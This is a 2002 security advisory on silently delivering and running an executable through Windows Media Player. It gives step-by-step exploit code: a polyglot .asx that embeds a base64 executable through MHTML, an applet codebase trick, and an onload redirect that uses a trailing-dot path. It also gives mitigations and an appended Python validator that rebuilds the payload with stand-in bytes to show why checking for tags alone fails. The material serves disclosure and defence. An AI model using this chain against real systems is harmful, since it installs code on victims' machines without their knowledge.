22nd Aug 2002 [SBWID-5653]
COMMAND
Windows MP silent delivery and installation of an executable on the
target computer
SYSTEMS AFFECTED
All?
PROBLEM
http-equiv [http-equiv@malware.com] [http://www.malware.com] revealed:
This is truly terrible. In addition to server side '404 errors',
cookies and who knows what else [perhaps user.dat, index.dat, even the
old inbox.mbx], the Windows Media Player appears to be severely
affected by Jelmer codebase too.
Combining the Jelmer codebase, the Sandblad dot bug and the 1-year-old
wimpy'flication of the media player [see:
http://www.malware.com/wimpy.html]:
1. Create an *.asx meta file as follows:
<ASX version="3">
<Entry>
<ref HREF="cluster.asf"/>
</Entry></ASX>
MIME-Version: 1.0
Content-Location:file:///malware.exe
Content-Transfer-Encoding: base64

TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
<applet CLASSID="CLSID:55555555-5555"
codebase="mhtml:file:///C:\My Documents\My Music\Virtual Albums\malware\f ck.asx!file:///malware.exe">
2. Create an *.asf file with URL flip as follows:
url: cluster.html
<body onload=malware()>
<script>
function malware(){
alert("malware");location=("file://C%3A%5CMy%20Documents%5CMy%20Music%5CVirtual%20Albums%5Cmalware%5Cf ck.asx%20.")
}
</script>
3. Create a *.wmd file comprising 1 and 2 above.
What happens?
Ordinarily the Windows Media Download Package file [*.wmd] creates a
folder with the given name of the *.wmd file -- e.g. malware.wmd will
create a folder called malware in the default location for so-called
"Virtual Music" -- specifically: My Documents\My Music\Virtual
Albums\malware. Security measures currently incorporated in the
extraction of the contents of the *.wmd do a reasonably good job of
ensuring that files contained within the Download Package are in fact
valid files.
A reasonably good job.
We find that the bare minimum for the *.asx meta file must include the
following:
<ASX><Entry><ref HREF=''/></ASX>
With these tags the Media Player will indeed extract the *.asx file
into our known folder.
So how do we make use of that?
Simple: 1,2,3 above, buckle your shoe.
Working Example:
===============
[hard coded for win98, trivial tweaking for others - harmless *.exe]
http://www.malware.com/malware.php
Important Notes:
===============
1. Suggestions have been made that in this particular instance, the
dot bug is not necessary.
2. Suggestions have been made that the 'open' "object" hole of
http://online.securityfocus.com/bid/5196 will work just as well.
3. Disable Active Scripting.
4. Disable Media Download [if you can].
5. Change the default location of "My Music...".
6. Hopefully this will all be a bad memory once all the patches,
packs, whatever are finally released.
7. Forget about the 'glitzy' advertising. Think long and hard about
the products you install.
Pathetic Notes:
==============
A.
1. The codebase 'vulnerability' is over 2 years old. Demonstrated in
a different form and mentioned in its current form in June 2000
2. Resurrected in fine fashion at the end of 2001 by the Pull with
many others demonstrating similar thereafter
3. Added to in splendid fashion by Jelmer in July 2002 with key
protocol
B. The dot bug by Sandblad of May 2002, patched, not patched, fully
functional to date. With patch and without patch. Not even actually
required in this instance.
C. The malware *.asx meta file and packable transportable *.wmd of
June 2001.
SOLUTION
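The mitigations the post itself offers are its Important Notes: disable Active Scripting, disable Media Download if you can, and move the default "My Music" location. The block below is an added example, not code from http-equiv or from this advisory. It rebuilds the step-1 polyglot *.asx (a minimal ASX followed by an MHTML part carrying a base64 executable), packs it the way step 3 does, and runs it through two checks: a guess at the "bare minimum tags" acceptance the post describes, which passes the file, and a strict check that parses the whole file as one ASX document and only allows each <ref> to name a member of the same package, which rejects it. Assumptions not taken from the page: that a *.wmd Download Package is a ZIP archive, the function names used here, and the constructed 'MZ' bytes that stand in for the executable. The last helper models the Win32 behaviour behind the step-2 redirect ending in "%20.": trailing spaces and dots are stripped from the final path component, so a name that no longer ends in .asx still opens f ck.asx.

```python
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import unquote

FAKE_EXE = b"MZ" + b"\x00" * 62  # constructed stand-in for malware.exe, not a real PE


def build_polyglot_asx(exe_bytes, asx_disk_url, entry_ref="cluster.asf"):
    """Step 1 of the post: a minimal ASX, then an MHTML part that Internet Explorer
    can address as mhtml:<asx_disk_url>!file:///malware.exe once Media Player has
    extracted the file into the Virtual Albums folder."""
    asx = '<ASX version="3">\n<Entry>\n<ref HREF="%s"/>\n</Entry></ASX>\n' % entry_ref
    mime = ("MIME-Version: 1.0\n"
            "Content-Location:file:///malware.exe\n"
            "Content-Transfer-Encoding: base64\n"
            "\n"  # blank line separating MIME headers from the body
            + base64.b64encode(exe_bytes).decode("ascii") + "\n\n")
    applet = ('<applet CLASSID="CLSID:55555555-5555" '
              'codebase="mhtml:%s!file:///malware.exe"></applet>\n' % asx_disk_url)
    return asx + mime + applet


# Assumed model of the acceptance test the post describes (not Media Player's code):
# the file counts as an ASX if <ASX><Entry><ref HREF=''/></ASX> appears anywhere in it.
_MIN_TAGS = re.compile(r"<ASX\b.*?<Entry\b.*?<ref\s+HREF=.*?</ASX>", re.I | re.S)


def lenient_asx_check(text):
    return _MIN_TAGS.search(text) is not None


# A <ref> may only name a plain media/playlist file: no scheme, no path separators.
_SAFE_REF = re.compile(r"^[A-Za-z0-9_ .-]+\.(asf|wma|wmv|asx)$", re.I)


def strict_asx_check(text, package_members):
    """Accept only a file that is, in its entirety, one well-formed ASX document
    whose every <ref> points at a member of the same package."""
    try:
        root = ET.fromstring(text)  # a trailing MIME body is 'junk after document element'
    except ET.ParseError:
        return False
    if root.tag.lower() != "asx":
        return False
    for elem in root.iter():
        if elem.tag.lower() != "ref":
            continue
        href = elem.get("HREF") or elem.get("href") or ""
        if not _SAFE_REF.match(href) or href not in package_members:
            return False
    return True


def build_wmd_package(members):
    """Step 3 of the post. Assumption: a *.wmd Download Package is a ZIP archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def validate_package(wmd_bytes):
    """Map each *.asx member of the package to (lenient_result, strict_result)."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(wmd_bytes)) as zf:
        names = set(zf.namelist())
        for name in names:
            if name.lower().endswith(".asx"):
                text = zf.read(name).decode("latin-1")
                results[name] = (lenient_asx_check(text), strict_asx_check(text, names))
    return results


def win32_opens(url):
    """Step 2's redirect ends in '%20.' (a space and a dot). Win32 strips trailing
    spaces and dots from the last path component, so an extension check sees a name
    that does not end in .asx while the file system opens f ck.asx.
    Returns (name as written in the URL, name the file system actually opens)."""
    name = unquote(url).replace("\\", "/").rsplit("/", 1)[-1]
    return name, name.rstrip(" .")


if __name__ == "__main__":
    disk_url = "file:///C:\\My Documents\\My Music\\Virtual Albums\\malware\\f ck.asx"
    package = build_wmd_package({
        "f ck.asx": build_polyglot_asx(FAKE_EXE, disk_url),
        "cluster.asf": b"constructed placeholder, not a real ASF",  # constructed
    })
    print(validate_package(package))  # {'f ck.asx': (True, False)}
    print(win32_opens("file://C%3A%5CMy%20Documents%5CMy%20Music%5CVirtual%20Albums"
                      "%5Cmalware%5Cf%20ck.asx%20."))
```

Run it with python3 and the polyglot passes the lenient check and fails the strict one; the same strict check also rejects the post's "bare minimum" `<ASX><Entry><ref HREF=''/></ASX>`, which is not even well-formed XML. The lesson for any extractor is that "contains the expected tags" is not "is the expected file type": validate the whole payload, not a prefix of it.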